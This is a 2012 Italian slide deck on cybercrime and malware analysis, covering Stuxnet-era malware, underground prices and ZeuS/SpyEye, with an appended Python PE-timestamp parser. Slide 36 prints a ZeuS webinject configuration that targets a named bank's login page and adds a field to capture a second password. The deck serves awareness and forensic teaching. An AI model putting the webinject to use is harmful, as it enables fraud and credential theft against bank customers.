Crimini Informatici 2012


  1. Crimini Informatici 2012 (Computer Crime 2012): Digital Investigations in the Judicial and Forensic Field
     Terrorism, espionage and armies of botnets. The cyberwar is already under way. Sophisticated digital weapons, carefully designed to hit specific targets, are the most worrying threat ever faced.
  2. Who is?
     ● Author: Gianni Amato
     ● Site: www.securityside.it
     ● Blog: www.gianniamato.it
     ● Email: amato@securityside.it
     ● Twitter: @guelfoweb
     IT Security and Forensics Consultant. Specialized in Cybercrime Intelligence for Internet Industry and Government Agencies.
  3. What Cybercrime Is
     ● A crime like any other, with the addition of an IT component
     ● The IT component can be the means or the target of the crime (or both)
  4. Let's start with Cyberwar
  5. The apocalypse: what a hypothetical cyber attack on critical infrastructure would entail
     ✔ Online train and flight bookings blocked
     ✔ Airline and railway control systems down
     ✔ Email communications interrupted
     ✔ Chaos in public administrations
     ✔ Refineries and oil pipelines out of control
     ✔ Water, gas and the power grid out of service
  6. Terrorism?
     ● Yes, it is important to pay attention to all forms of terrorism. In particular to psychological terrorism.
  7. Impossible that it could happen?
     ● No, the Cyberwar has already begun. A digital war between nations known to be in conflict.
       – 2010: Stuxnet
       – 2011: Duqu
       – 2011: Gauss
       – 2012: Mahdi
       – 2012: Flame
       – 2012: Wiper
       – 2012: Shamoon
  8. Who could be behind it?
     ● Anyone!
       – From secret services to extremist groups
       – From the military to terrorists
       – Nations that have been in conflict for years
  9. 2010: Stuxnet
     ● Discovered in June 2010
     ● Objective: sabotage the Iranian nuclear programme
       – SCADA systems
         ● Windows + WinCC + PCS 7
     ● US project "Operation Olympic Games", started by George W. Bush
       – Spreads via USB
       – Exploits 0-day vulnerabilities
  10. 2010: Stuxnet
     ● The password of the SCADA systems (WinCC DB) had been known for over 2 years. It was published in a forum and then removed by the moderator
     ● The authors held digital certificates: Realtek and JMicron
     ● Verisign revokes the certificates on 16 July
     ● On 17 July a new version of Stuxnet is detected, carrying the certificates stolen from JMicron
  11. 2010: Stuxnet
     ● The numeric value 1979050 found in the system registry of machines compromised by Stuxnet has been interpreted as the possible date of birth of one of the authors: 09/05/1979
     ● It has been established that the date found inside Stuxnet's code, 24/6/12, coincides exactly with the date of its demise
  12. 2011: Duqu
     ● Discovered in September 2011
     ● Shares code with Stuxnet (?)
     ● The target is once again Iran: assessing the state of the nuclear programme
     ● Different objective: information theft
     ● Uses stolen certificates
     ● Has keylogger functions
     ● Exploits 0-day vulnerabilities (Windows kernel)
  13. 2011: Gauss
     ● Discovered in September 2011
     ● Detected in Lebanon, Israel, Palestine, the United States and the United Arab Emirates
     ● Objective: theft of passwords and bank accounts
     ● Believed to have been created by the same authors as Stuxnet and Duqu
  14. 2012: Mahdi
     ● Discovered in February 2012
     ● The name comes from strings found in the code that refer to the Islamic Messiah
     ● The authors are unknown
     ● Has keylogger and screen-capture functions
     ● Steals audio files, text files and images
     ● Exploits bugs in Word and PowerPoint
  15. 2012: Flame
     ● Discovered in April 2012
     ● Identified by Kaspersky Lab in Iran (Iranian Oil Ministry)
     ● CrySyS Lab maintains that the malware may have been online since 2007
     ● Propagates via USB keys, and on the local network through a Windows vulnerability on systems with a shared printer
     ● Uses a fake digital certificate
  16. 2012: Flame
     ● Has keylogger functions
     ● Captures images
     ● Records audio (Skype conversations)
     ● Steals text documents and DWG files (AutoCAD projects)
     ● Similarities with Stuxnet and Duqu were found, but with a different objective: industrial espionage
  17. 2012: Does Flame date back to 2008? http://www.crysys.hu/skywiper/skywiper.pdf
     $ python peframe.py --export mssecmgr.ocx
     [IMAGE_EXPORT_DIRECTORY]
     0x5F694 0x0  Characteristics: 0x0
     0x5F698 0x4  TimeDateStamp: 0x493EA336 [Tue Dec 9 16:56:22 2008 UTC]
     0x5F69C 0x8  MajorVersion: 0x0
     0x5F69E 0xA  MinorVersion: 0x0
     0x5F6A0 0xC  Name: 0x13C4EE
     0x5F6A4 0x10 Base: 0x1
     0x5F6A8 0x14 NumberOfFunctions: 0x5
     0x5F6AC 0x18 NumberOfNames: 0x5
     0x5F6B0 0x1C AddressOfFunctions: 0x13C4BC
     0x5F6B4 0x20 AddressOfNames: 0x13C4D0
     0x5F6B8 0x24 AddressOfNameOrdinals: 0x13C4E4
  18. 2012: Wiper
     ● A soldier sent onto the battlefield to clean up the traces
     ● Its purpose is to erase all traces left by Stuxnet and Duqu
     ● Priority for removal is given to .PNF files (used by Stuxnet)
     ● It also removes all data useful to forensic analysts (this is no accident)
  19. 2012: Shamoon
     ● Discovered in August 2012
     ● Shamoon is the name found in the code
     ● Designed for espionage
     ● Targeted a Saudi state oil company
     ● Erases the data on the infected PC, replacing it with images (an American flag)
     ● The original files are sent to an unknown server
  20. Why analyse malware?
     Analysis is a procedure that should be carried out in a laboratory, whenever possible, and makes it possible to reconstruct the malware's logic in order to answer the four questions that arise when a machine is compromised.
  21. The 4 Questions
     ● 1. What is the purpose of the malware?
     ● 2. What information did it manage to steal?
     ● 3. Where was the information sent?
     ● 4. How did it get here?
  22. What are we dealing with?
     ● Highly skilled people
     ● Obfuscated code
     ● Cryptography (especially during data transmission)
     ● Rootkit functions
     ● 0-day vulnerabilities
  23. Types of Analysis
     ● Static Analysis
       – Code
       – Signature
       – Evidence
     ● Dynamic Analysis
       – Behaviour
       – Mutations
       – Connections
  24. Remote Access Trojan
  25. Malware Anti-Analysis
     ● Anti Online-Analysis
       – ThreatExpert
       – CWSandbox
       – Anubis
     ● Anti Virtualization
       – VMware
       – Virtualbox
       – Virtual PC
     ● Anti Debug/Disass.
       – Softice
       – OllyDbg
       – IDA Pro
  26. Back to Cybercrime
  27. Shared Vulnerabilities
  28. Purchases in the Russian Underground
     ● Hacking a Gmail account: $162
     ● Hacking a corporate mailbox: $500
     ● Scans of legitimate passports: $5 each
     ● Winlocker ransomware: $10-20
     ● Unintelligent exploit bundle: $25
     ● Intelligent exploit bundle: $10-3,000
     ● Traffic: $7-15 per 1,000 visitors for the most valuable traffic (from the US and EU)
  29. Purchases in the Russian Underground
     ● Basic crypter (for inserting rogue code into a benign file): $10-30
     ● SOCKS bot (to get around firewalls): $100
     ● Hiring a DDoS attack: $30-70 for a day, $1,200 for a month
     ● Email spam: $10 per one million e-mails
     ● Expensive email spam (using a customer database): $50-500 per one million e-mails
  30. Purchases in the Russian Underground
     ● SMS spam: $3-150 per 100-100,000 messages
     ● Bots for a botnet: $200 for 2,000 bots
     ● DDoS botnet: $700
     ● ZeuS source code: $200-$500
     ● Windows rootkit (for installing malicious drivers): $292
     ● Hacking a Facebook or Twitter account: $130
  31. ZeuS: a criminal project, (now) Open Source
  32. ZeuS Info
     ● Online since 2006
     ● Written in Visual C++
     ● The authors do not like to call it a Trojan, Backdoor or Virus. They simply call it a "Bot"
     ● Targets MS Windows systems
     ● Based on interception of the WinAPI
  33. ZeuS Ring
     ● Ring3
       – Guarantees adaptability and scalability
       – Can operate as Guest User
  34. ZeuS Client Features
     ● Traffic sniffer on the TCP protocol
     ● Interception of FTP logins
     ● Interception of POP3 logins
     ● Intercepts calls to the Wininet.dll library (used by Internet Explorer) and nspr4.dll (used by Firefox) for HTTP and HTTPS connections
     ● Encryption 1024-bit RSA
  35. ZeuS Server Features
     ● Uses Socks 4/4a/5 with UDP and IPv6 support
     ● Connections to the infected machine via FTP or RDP
     ● Screenshots in real time
     ● Remote command execution
  36. ZeuS HTTP-inject/HTTP-grabber: webinjects.txt
     set_url https://privati.internetbanking.bancaintesa.it/sm/login/IN/box_login.jsp GP
     data_before
     name="PASSWORD"*<tr>
     data_end
     data_inject
     <td height="32" class="grigio10">password dispositiva <br/> <input name="PASSDIS" type="password" size="12" onkeypress="javascript:entsub(PASSWORD, event);" tabindex="2" style="width: 110px;"/></td> <td><img alt="" src="/static/i/spaziatore.gif" width="10"/></td>
     data_end
     data_after
     data_end
  37. ZeuS HTTP-inject/HTTP-grabber: Before - After
  38. ZeuS Installation
     ✔ Apache
     ✔ PHP
     ✔ MySql
  39. ZeuS Control Panel
  40. ZeuS Botnet
  41. The Competition Arrives
     The first version of SpyEye, with a Kill Zeus option. Created to grab a share of the ZeuS market.
  42. SpyEye
     ● Around since 2009
     ● Designed by Russians
     ● Costs $500 on the black market
     ● Most of the business is based on plugins
  43. SpyEye + ZeuS
     ● Brute force password guessing
     ● Jabber notification
     ● VNC module
     ● Auto-spreading
     ● Auto-update
     ● Screenshot system
  44. Questions?
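
Slide 17 dates a Flame module from the TimeDateStamp of its PE export directory. The parser below is an added example (not part of the original deck, and not peframe's code) that reads that field and the COFF header timestamp from a PE image so the two can be compared; the sample image is constructed, reusing only the 0x493EA336 value printed on the slide, and all function names are hypothetical. Both fields are written at link time and can be edited afterwards, so they are a lead for dating a sample, not proof.

```python
import struct
from datetime import datetime, timezone


def _rva_to_offset(data, rva, sec_table, n_sections):
    """Translate an RVA to a file offset using the 40-byte section headers."""
    for i in range(n_sections):
        vsize, vaddr, rsize, rptr = struct.unpack_from(
            "<IIII", data, sec_table + i * 40 + 8)
        if vaddr <= rva < vaddr + max(vsize, rsize):
            return rptr + (rva - vaddr)
    raise ValueError("RVA 0x%X is not inside any section" % rva)


def _parse(data):
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    n_sections, coff_ts = struct.unpack_from("<HI", data, coff + 2)
    (opt_size,) = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic == 0x10B:        # PE32
        dirs = opt + 96
    elif magic == 0x20B:      # PE32+
        dirs = opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%X" % magic)
    (n_dirs,) = struct.unpack_from("<I", data, dirs - 4)  # NumberOfRvaAndSizes
    if n_dirs == 0:
        return coff_ts, None
    export_rva, _size = struct.unpack_from("<II", data, dirs)  # directory 0
    if export_rva == 0:
        return coff_ts, None
    off = _rva_to_offset(data, export_rva, opt + opt_size, n_sections)
    # IMAGE_EXPORT_DIRECTORY: Characteristics, then TimeDateStamp
    _characteristics, export_ts = struct.unpack_from("<II", data, off)
    return coff_ts, export_ts


def pe_timestamps(data):
    """Return (coff_ts, export_ts); export_ts is None when nothing is exported."""
    try:
        return _parse(data)
    except struct.error as exc:
        raise ValueError("truncated PE image") from exc


def to_utc(ts):
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def build_constructed_sample():
    """Constructed minimal PE32 image: one section holding an export directory."""
    buf = bytearray(0x400)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)
    buf[0x40:0x44] = b"PE\0\0"
    # COFF header; 0x4F000000 is a constructed value that differs on purpose
    struct.pack_into("<HHIIIHH", buf, 0x44, 0x14C, 1, 0x4F000000, 0, 0, 224, 0x2102)
    opt = 0x58
    struct.pack_into("<H", buf, opt, 0x10B)
    struct.pack_into("<I", buf, opt + 92, 16)            # NumberOfRvaAndSizes
    struct.pack_into("<II", buf, opt + 96, 0x1000, 40)   # export directory RVA/size
    struct.pack_into("<8sIIII", buf, opt + 224, b".edata", 0x200, 0x1000, 0x200, 0x200)
    struct.pack_into("<II", buf, 0x200, 0, 0x493EA336)   # value shown on slide 17
    return bytes(buf)


if __name__ == "__main__":
    coff_ts, export_ts = pe_timestamps(build_constructed_sample())
    print("COFF header :", to_utc(coff_ts).isoformat())
    print("Export dir  :", to_utc(export_ts).isoformat())
    if coff_ts != export_ts:
        print("Timestamps disagree: at least one was set independently of the other")
```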
